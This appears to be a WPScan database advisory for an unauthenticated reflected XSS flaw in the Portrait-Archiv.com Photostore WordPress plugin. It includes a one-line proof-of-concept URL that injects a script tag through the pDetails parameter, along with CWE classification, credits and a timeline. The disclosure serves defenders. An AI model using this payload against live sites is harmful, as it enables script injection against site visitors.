Portrait-Archiv.com Photostore <= 3.1 - Unauthenticated Reflected XSS



Description
The pDetails GET parameter from the js/imageDetails.php is vulnerable to an unauthenticated reflected XSS attack.

Plugin is still affected and has been closed.
Proof of Concept
/wp-content/plugins/portrait-archiv-shop/js/imageDetails.php?pDetails=);});</script><script>alert("XSS")</script>

Affects Plugin

References

PACKETSTORM 154343

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Ricardo Sanchez
Views 2696
Verified Yes
WPVDB ID 9859

Timeline

Publicly Published 2019-09-03 (2 months ago)
Added 2019-09-04 (2 months ago)
Last Updated 2019-09-04 (2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin